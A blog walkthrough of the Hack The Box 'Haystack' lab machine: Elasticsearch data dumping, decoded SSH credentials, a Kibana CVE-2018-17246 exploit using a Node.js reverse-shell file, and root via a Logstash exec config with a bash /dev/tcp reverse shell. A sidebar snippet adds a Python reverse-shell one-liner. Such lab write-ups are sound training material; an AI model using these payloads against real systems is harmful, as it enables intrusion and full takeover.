Haystack - hack the box

最新推荐文章于 2023-09-02 22:09:46 发布
最新推荐文章于 2023-09-02 22:09:46 发布
阅读量585 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/neal1991/article/details/103331595
版权

Introduction

Target: 10.10.10.115(Linux)

Kali: 10.10.16.61

HayStack is an easy box in hack the box. But it does isn't easy at all. It's annoying to find the user and password in the messy Spanish. For the root, you should have a basic understanding of ELK. Hence, the box is quite fresh in htb.

Information Enumeration

As usual, nmap is utilized to detect detailed ports and services.


   
   
  1. # Nmap 7.70 scan initiated Sun Jun 30 01:10:53 2019 as: nmap -sT -p- --min-rate 1500 -oN ports 10.10.10.115
  2. Nmap scan report for 10.10.10.115
  3. Host is up (0.27s latency).
  4. Not shown: 65532 filtered ports
  5. PORT STATE SERVICE
  6. 22/tcp open ssh
  7. 80/tcp open http
  8. 9200/tcp open wap-wsp

Then detect the detailed services:


   
   
  1. # Nmap 7.70 scan initiated Sun Jun 30 01:13:05 2019 as: nmap -sC -sV -p22,80,9200 -oN services 10.10.10.115
  2. Nmap scan report for 10.10.10.115
  3. Host is up (0.38s latency).
  5. PORT STATE SERVICE VERSION
  6. 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
  7. | ssh-hostkey:
  8. | 2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
  9. | 256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
  10. |_ 256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
  11. 80/tcp open http nginx 1.12.2
  12. |_http-server-header: nginx/1.12.2
  13. |_http-title: Site doesn't have a title (text/html).
  14. 9200/tcp open http nginx 1.12.2
  15. |_http-server-header: nginx/1.12.2
  16. |_http-title: 502 Bad Gateway

For port 80, we find nothing except a picture of a needle. Exiftool is used to analyze. But nothing interesting found. Try to use gobuster to brute force the directory, but have not found any useful directories.

For port 9200, nmap seems to be failed to detect. But this port should be familiar to elasticserarch users. Elasticsearch is a popular search database in recent years. Something is interesting in elasticsearch. We will talk about this later.

Exploit

In the above, we have talked about the ports. The elasticsearch should be the point. Try to obtain the data of elasticsearch. There is no authentication for elasticsearch in default. Hence, we can read the data from elasticsearh. In the beginning, I have tried to use kibana to analyze the data. Kibana is one component of ELK, which is a powerful tool to analyze the data of elasticsearch. And it's easy to use. Just download the files, then decompress the files. There is only one step to finish before run kibana. Modify elasticsearch.url in config.yml, it should be configured to 10.10.10.115:9200. Then you can run kibana directly.

When you access to kibana, you will find two indexes: bank and quotes. The bank seems to be data of bank users information, which seems not to be useful. For index quotes, we have found nothing but the quote of Spanish. To be honest, Spanish is really messy for me to read. And I cannot find anything interesting. Kibana is useful for query specific field. But quotes seems to be an article. So I decide to dump all the data of quotes.

elasticsearh-dump is useful to dump the data from elasticsearch. Firstly, install the tool by npm install elasticdump-g. Then dump the data by:


   
   
  1. elasticdump \
  2.  --input=http://production.es.com:9200/quotes \
  3.  --output=quptes.json \
  4.  --type=data

The result will be json file of a list of objects consist of some keys. The most important is the quote in the result. But the json is still not convenient to read. And the id may be the sequence of quotes. So, I decide to write a script to order the quotes by id and join all the quotes together.


   
   
  1. import json
  2. result = {}
  3. txt = ""
  4. with open("quotes.json") as f:
  5.  data = f.readlines()
  6.  for ele in data:
  7.  obj = json.loads(ele)
  8.  id = int(obj["_id"])
  9.  result[id] = obj["_source"]["quote"]
  10.  for i in sorted(result.keys()):
  11.  print(i)
  12.  txt = txt + result[i] + "\n\n"
  13. with open("result.md", "w") as f1:
  14.  f1.write(txt)

Now, I have the result of quotes. And it's easy to read. I place this file in Github. When I read this file by Chrome, Chrome can help me translate this article. So, it's easier to find special things in the article. I have found two interesting strings in the article.


   
   
  1. Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg

   
   
  1. Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk=

If you translate the two stings into English respectively.


   
   
  1. I have to save the password for the machine: dXNlcjogc2VjdXJpdHkg

   
   
  1. This key cannot be lost, I keep it here: cGFzczogc3BhbmlzaC5pcy5rZXk=

The end of the strings is encoded by base64. When decoded, we can find the username and password. Then you can ssh by the username and password.

To be honest, I don't like the user of the box. But it does works as the keyword: you have to find a needle in haystack.

PrivEsc

If you look around the box, you will find the box is installed with ELK. You can find kibana and logstash in the box. If you google kibana exploit. You will find CVE-2018-17246 in Github. It has detailed illustrates the ways to exploit.

However, there is a problem that the kibana service is only running in local. So you cannot access kibana service externally. There is a way to utilize ssh to redirect the network stream.


   
   
  1. ssh 5601:localhost:5601 security@10.10.10.115

Then, we can access to the kibana service in 10.10.10.115 by access to localhost:5601. Place the server.js in tmp directory of the target machine.


   
   
  1. // server.js
  2. (function(){
  3.  var net = require("net"),
  4.  cp = require("child_process"),
  5.  sh = cp.spawn("/bin/sh", []);
  6.  var client = new net.Socket();
  7.  client.connect(1234, "10.10.16.61", function(){
  8.  client.pipe(sh.stdin);
  9.  sh.stdout.pipe(client);
  10.  sh.stderr.pipe(client);
  11.  });
  12.  return /a/; // Prevents the Node.js application form crashing
  13. })();

Then we can implement by burp, remember to set up nc listener nc-lvnp1234


   
   
  1. GET /api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../tmp/server.jssudo -l HTTP/1.1
  2. Host: localhost:5601
  3. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
  4. Accept: */*
  5. Accept-Language: en-US,en;q=0.5
  6. Accept-Encoding: gzip, deflate
  7. Referer: http://localhost:5601/app/kibana
  8. content-type: application/json
  9. kbn-version: 6.4.2
  10. origin: http://localhost:5601
  11. Connection: close

Wait for a while, then we are kibana.

But we are still not root! Don't be upset. Let's move on. If we look at the logstash in the machine carefully, we will find something interesting. We find the user group kibana has write permission of conf.d of logstash.


   
   
  1. ls -lah
  2. total 52K
  3. drwxr-xr-x. 3 root root 183 jun 18 22:15 .
  4. drwxr-xr-x. 83 root root 8,0K jun 24 05:44 ..
  5. drwxrwxr-x. 2 root kibana 62 jun 24 08:12 conf.d
  6. -rw-r--r--. 1 root kibana 1,9K nov 28 2018 jvm.options
  7. -rw-r--r--. 1 root kibana 4,4K sep 26 2018 log4j2.properties
  8. -rw-r--r--. 1 root kibana 342 sep 26 2018 logstash-sample.conf
  9. -rw-r--r--. 1 root kibana 8,0K ene 23 2019 logstash.yml
  10. -rw-r--r--. 1 root kibana 8,0K sep 26 2018 logstash.yml.rpmnew
  11. -rw-r--r--. 1 root kibana 285 sep 26 2018 pipelines.yml
  12. -rw-------. 1 kibana kibana 1,7K dic 10 2018 startup.option

conf.d is the config directory of logstash consists of three files in general. Take a deep look into the directory, you'll find an interesting thing. There is a command executes in output.conf. If you have basic knowledge of logstash, you should know the function of the three files. input.conf is used to config the data source. filter.conf is used to process the data, which is usually combined with grok. output.conf is used to output the processed data. We can find there is an exec in the output.conf.

So the exploit is very clear. Create a file in /opt/kibana/ whose name begins with logstah_. And make sure the content in the file can be parsed by grok correctly. Then the command can be executed successfully. The most important part is how to create the content to be parsed to correct comando. So you should know how to use grok. Grok is utilized to recognize specific fields by the regular expression. [Grok Debugger] is a useful tool to test grok online.

The expression is quite simple. If you know the regular expression, it will not be hard to understand the expression here.

filter.conf


   
   
  1. filter {
  2.  if [type] == "execute" {
  3.  grok {
  4.  match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
  5.  }
  6.  }
  7. }

input.conf


   
   
  1. input {
  2.  file {
  3.  path => "/opt/kibana/logstash_*"
  4.  start_position => "beginning"
  5.  sincedb_path => "/dev/null"
  6.  stat_interval => "10 second"
  7.  type => "execute"
  8.  mode => "read"
  9.  }
  10. }

output.conf


   
   
  1. output {
  2.  if [type] == "execute" {
  3.  stdout { codec => json }
  4.  exec {
  5.  command => "%{comando} &"
  6.  }
  7.  }
  8. }

Now, we have known how to create the corresponding comando. The next step is to choose the command to execute. There is not nc in the machine. But there's python and perl in the machine. But the reverse shell command is a little long. So I choose to use bash-i>&/dev/tcp/10.10.16.61/12340>&1. Write the content to the corresponding file:


   
   
  1. echo "Ejecutar comando: bash -i >& /dev/tcp/10.10.16.61/1234 0>&1" > /opt/kibana/logstash_1.txt

Use the nc to listen at port 1234, wait a while, root is coming.

历史靶机

Hack the box: Bastion

Holiday -- hack the box

Help - hack the box

Bashed -- hack the box

Nibbles - Hack the box

Cronos -- hack the box

看完三件事

  1. 点在看,让更多的人也能看到这篇内容。

  2. 关注公众号「mad_coder」,加星收藏,不定期分享原创知识。

  3. 点击菜单,查看往期精彩文章。

你点的每一个"在看"

我都当成了喜欢!

瑟荻
关注
实战HackTheBox里的Haystack(文章末尾有两个微信小程序抽奖活动~~)
知柯信安
12-25 852
第一步,在主机上运行Nmap扫描以发现正在运行的服务: root@kali:~/Documents/haystack# nmap -A -oN scan 10.10.10.115 Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-14 17:23 UTC Nmap scan report for 10.10.10.115 Host is up (0.017s latency). Not shown: 997 filtered ports PORT
Hack-The-Box-Three
ffff5的博客
04-17 524
Hack The Box初级靶机Three通关记录!
Hackthebox Three
lixiangshidie的博客
12-29 691
hackthebox three
Hack the box-Three
Ka_li12的博客
09-02 206
靶机地址。
Hack The Box - Three(新手友好)
weixin_45793727的博客
08-12 3755
thetoppers.htb应该是域名,把域名和IP加到hosts文件中,tee命令的作用就是读取标准输入内容,将读取到的内容数据写入到标准输出和文件中。看看s3,s3是亚马逊云存储的简单存储服务,全程是Simple Storage Service。如果成功的话可以看到我们监听的页面,如果没反弹成功可以看看10.10.16.60:8090是否有我们的shell.sh文件。我们通过命令执行shell,curl执行bash脚本反弹shell来实现命令行交互。生成bash一句话shell.sh。......
Hack The Box-Dancing
ffff5的博客
10-07 863
Hack The Box 基础靶场-Dancing通关记录
Python库 | drf_haystack-1.7.1rc2-py2.py3-none-any.whl
04-21
资源分类:Python库 所属语言:Python 使用前提:需要解压 资源全名:drf_haystack-1.7.1rc2-py2.py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | haystack-client-0.2.4.tar.gz
03-07
《Python库haystack-client-0.2.4详解》 在Python的世界里,库是开发者的重要工具,它们提供了丰富的功能,让编程变得更加高效和便捷。本文将深入探讨名为`haystack-client`的Python库,其版本为0.2.4,以tar.gz...
PyPI 官网下载 | restless-haystack-0.1.0.tar.gz
01-15
《PyPI官网下载:深入解析restless-haystack-0.1.0.tar.gz》 在Python的世界里,PyPI(Python Package Index)是开发者们不可或缺的资源库,它为全球的Python爱好者提供了海量的开源软件包。"restless-haystack-...
haystack-elasticsearch:将 elasticsearch 特定功能添加到 haystack
06-09
Haystack-ElasticSearch 版本: 0.3.0 地位: 稳定的 作者: 何塞·安东尼奥·佩迪格罗·洛佩斯 Haystack-ElasticSearch 是一个 Django 应用程序,它将 ElasticSearch 的一些特定功能添加到 django-haystack 中...
Docker+Kubernetes+Jenkins视频教程
01-01
Docker+Kubernetes+Jenkins视频教程
Needle in A Haystack -- Catch Multiple Zero-days Using Sandbox
08-21
Needle in A Haystack -- Catch Multiple Zero-days Using Sandbox
HackTheBox::Bashed
aya3t的博客
10-11 460
HackTheBox::Bashed
HTB-hackthebox-Bashed
yutianovo的博客
03-01 516
靶机描述 清单 信息搜集 nmap dirsearch 未受到保护的危险php文件 提权 sudo -l 定时脚本 信息搜集 靶机IP 端口扫描 nmap 10.10.10.68 Not shown: 999 closed ports PORT STATE SERVICE 80/tcp open http 80 页面内容如下 介绍了 phpbash https://github.com/Arrexel/phpbash 功能是在 Web 页面里可以像交互式shell 一样进行
Bashed -- hack the box
neal1991的专栏
04-04 518
IntroductionTarget: 10.10.10.68 (OS: Linux)Kali linux: 10.10.16.44Information Enumera...
Hack the box靶机 bashed
菜浪马废的博客
05-07 362
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.27",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subp...
hackthebox-bashed (考点:phpbash,linux修改脚本)
冬萍子癸水
04-11 617
nmap 就一个80. 打开看看都很直白提示了是phpbash 拿dirbuster扫一扫 看到phpbash,点进去。进入网页版bash 把这个shell弹到我本机来 命令有很多,但我试了几个没反应 最后这个OK python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);...
HackTheBox-Bashed渗透测试
weixin_43111940的博客
04-13 314
端口信息,只开了80端口 目录扫描 gobuster dir -u http://10.10.10.68 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x 'html,php,asp,aspx,zip,rar' /dev/目录下有php的shell文件 通过执行命令可以判断是Linux系统,因为对命令的大小写敏感 既然可以执行命令,尝试一下用反弹shell命令,尝试了php,Linux的反弹命令,但是没有拿到she
hack the box靶场练习之bashed
qq_44767905的博客
02-06 274
hack the box靶场练习之bashed
drf-haystack
最新发布
09-12
DRF-Haystack是一个用于将Django Rest Framework(DRF)与Haystack集成的库。Haystack是Django中的全文搜索框架,而DRF是一个用于构建RESTful API的强大框架。 DRF-Haystack提供了一组用于处理搜索请求和响应的DRF视图和序列化器,使得在API中实现全文搜索变得更加简单。它允许你定义搜索字段、过滤器和排序选项,并提供了灵活的配置选项。通过使用DRF-Haystack,你可以方便地将全文搜索功能添加到你的Django RESTful API中。 要使用DRF-Haystack,首先需要配置Haystack来进行全文搜索索引的创建和管理。然后,你可以使用DRF-Haystack提供的视图和序列化器类来定义搜索API端点,并将其集成到你的DRF应用程序中。 总结来说,DRF-Haystack是一个将DRF和Haystack集成起来,使得在Django RESTful API中实现全文搜索变得更加简单和方便的库。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值